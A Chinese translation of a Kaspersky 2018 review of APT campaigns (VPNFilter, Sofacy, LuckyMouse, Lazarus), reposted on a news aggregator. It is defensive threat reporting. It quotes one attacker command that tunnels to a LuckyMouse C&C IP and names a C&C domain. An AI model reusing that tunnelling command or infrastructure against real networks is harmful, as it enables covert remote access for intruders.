卡巴斯基：2018年度安全大事件盘点

今年5月，Cisco Talos团队的研究人员发布了他们针对VPNFilter的研究结果，这是一个用于感染不同品牌路由器的恶意软件，主要针对乌克兰的目标发动攻击，但同时也影响了54个国家的路由器。关于该恶意软件的分析，请参考这篇文章和这篇文章。最初，分析人员认为该恶意软件感染了大约500000台路由器，包括小型办公室或家庭办公室(SOHO)中的Linksys、MikroTik、Netgear和TP-Link网络设备，以及QNAP网络附加存储(NAS)设备。但实际上，受感染的路由器清单显然要长得多，总共有75种设备，包括华硕、D-Link、华为、Ubiquiti、UPVEL和中兴。恶意软件能够使受感染的设备停止工作、执行Shell命令、创建用于匿名访问设备的TOR配置或配置路由器的代理端口和代理URL以控制浏览会话。但是，该风险也会扩散到设备支持的网络中，从而扩大了攻击范围。我们的全球研究和分析团队(GReAT)的研究人员详细分析了VPNFilter使用的C&C机制。其中一个有趣的问题是，谁是这个恶意软件的幕后黑手?Cisco Talos表示，该恶意软件的背后是一个由国家或州支持的威胁行为者。美国联邦调查局在其关于使用Sink-holing 技术关停C&C服务器的报告中表示，Sofacy(又名APT28、Pawn Storm、Sednit、STRONTIUM和Tsar Team)是该恶意软件的始作俑者。在此前针对乌克兰的攻击所使用的BlackEnergy恶意软件中，有一些代码与之相同。

Sofacy是卡巴斯基实验室多年来一直追踪的恶意组织，该网络间谍组织保持高度活跃，并且频繁产出恶意软件。在2月，我们发布了2017年Sofacy恶意活动的概述，并揭示了2017年该恶意组织逐渐从北约的目标转向中东、中亚以及其他地区的目标。Sofacy使用鱼叉式网络钓鱼和水坑攻击来窃取信息，包括帐户凭据、敏感通信和文档。该威胁行为者还利用0day漏洞来部署其恶意软件。

Sofacy针对不同的目标部署了不同的工具。2017年年初，该恶意组织的经销商针对军事和外交组织(主要位于北约国家和乌克兰)开展恶意活动。在今年晚些时候，该组织利用其武器库中的Zebrocy和SPLM，针对更广泛的组织(包括科学与工程中心以及新闻媒体)，面向中亚和远东地区发动攻击。与其他复杂的威胁参与者一样，Sofacy不断开发新的工具，保持高水平的操作安全性，并专注于使其恶意软件难以检测。一旦在网络上发现了Sofacy这类高级恶意组织的任何活动迹象，应该立即检查系统上的登录和异常管理员访问权限，彻底扫描或使用沙箱运行收到的所有附件，并将电子邮件等服务设置为双因素身份验证和通过VPN访问。借助APT情报报告、YARA等威胁搜索工具以及KATA(卡巴斯基反目标攻击平台)等高级检测解决方案，可以有助于用户了解恶意组织的目标，并提供检测恶意活动的强大方法。

我们的研究表明，Sofacy并不是唯一在远东地区运营的恶意组织，这有时会导致不同恶意组织之间的目标重叠。我们已经发现，Sofacy的Zebrocy恶意软件利用俄罗斯恶意组织Mosquito Turla的集群竞争访问受害者计算机的案例，其使用的SPLM后门软件与Turla和Danti竞相攻击，都以中亚地区政府、科技、军事相关的组织为攻击目标。最有趣的目标重叠，可能是Sofacy与Lamberts家族之间的重叠。在检测到服务器上存在Sofacy组织的恶意软件之后，研究人员发现该服务器此前已被Grey Lambert恶意软件攻击。这台被攻陷的服务器属于一家设计和制造航空航天和防空技术的中国企业集团。但是，原始的SPLM投递载体仍然未知，这就引发了很多假设的可能性，包括Sofacy可能正在使用尚未被发现的新型漏洞利用方式、后门产生了新的变种，或者Sofacy以某种方式成功利用了Gray Lambert的通信渠道来下载其恶意软件。甚至，可能之前的Lambert感染是该恶意活动中故意留下的虚假线索。我们认为，最可能的答案是，Sofacy利用未知的新PowerShell脚本或合法但存在漏洞的Web应用程序来加载并执行SPLM代码。

6月份，我们报告了一项针对中亚国家数据中心的持续恶意活动。在这一活动中，目标的选择尤为重要，这意味着攻击者能够一举获得大量的政府资源。我们认为，攻击者通过在相应国家的官方网站上插入恶意脚本来执行水坑攻击。我们根据恶意活动中所使用的工具和策略，以及C&C服务器update.iaacstudio[.]com，推断该恶意活动由LuckyMouse组织进行(又名EmissaryPanda和APT27)。该恶意组织此前的目标是政府组织，也包括中亚地区的组织。用于攻击数据中心的原始载体尚不清楚。我们此前观察到，LuckyMouse使用武器化工具，借助CVE-2017-11882(Microsoft Office公式编辑器漏洞，自2017年12月以来被广泛使用)进行攻击，但我们无法证明这一系列工具与此次攻击有关。攻击者可能会使用水坑攻击的方式来感染数据中心内部的计算机。

在9月，我们报道了LuckyMouse的另一起活动。自3月份以来，我们发现了一些感染行为，其中一个以前未知的木马被注入到“lsass.exe”系统进程内存中。注入过程是由经过签名的32位或64位网络过滤驱动程序NDISProxy实现，这一驱动程序由中国的LeagSoft公司签署，该公司是一家位于深圳的信息安全软件开发商，我们通过CN-CERT报告了这一问题。该恶意活动针对的是中亚政府组织，我们认为此次攻击与该地区的高层会议有关。在攻击中所使用的Earthworm隧道，对于使用中文的恶意组织来说是非常典型的。此外，攻击者使用的命令之一(-s rssocks -d 103.75.190[.]28 -e 443)创建了到先前已知的LuckyMouse C&C服务器的隧道。该恶意活动所针对的目标，也与该恶意组织此前选择的目标一致。我们没有发现任何鱼叉式网络钓鱼或水坑活动的迹象，我们认为攻击者是通过已经被攻陷的网络来进行恶意软件传播。

Lazarus是一个成熟的恶意组织，从2009年以来就开始进行网络间谍活动和网络破坏活动。近年来，该组织开始针对全球金融组织开展恶意活动。在8月，我们发现该组织已经成功攻陷了几家银行，并渗透了一些全球加密货币交易所和金融科技公司。在协助应急响应的同时，我们了解到受害者是通过带有木马的加密货币交易应用被感染的。一位安全意识较为薄弱的员工从看似合法的网站下载了第三方应用程序，并感染了一个名为Fallchill的恶意软件，这是Lazarus近期开始使用的劳工具。似乎Lazarus已经找到了一种有效的方法来创建一个看起来合法的网站，并将恶意Payload注入到看似合法的软件更新机制中。在这种情况下，恶意组织创建了一个虚假的供应链，而并没有攻陷一个真正的供应链。无论如何，Lazarus集团在攻击供应链方面取得的成功，表明了他们会继续利用这种攻击方式。攻击者针对非Windows平台做出了额外的努力，并且开发了针对macOS系统的恶意软件，同时该网站提示称Linux版本即将推出。这可能是我们第一次发现这个APT组织利用针对macOS的恶意软件。看起来，为了针对特定高级目标发动攻击，恶意组织被迫要开发macOS恶意软件工具。Lazarus集团扩展其目标操作系统列表的事实，应该为非Windows用户敲响警钟。读者可以在这里阅读我们关于AppleJeus的报告。

（编辑：财气旺网 - 海宁网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!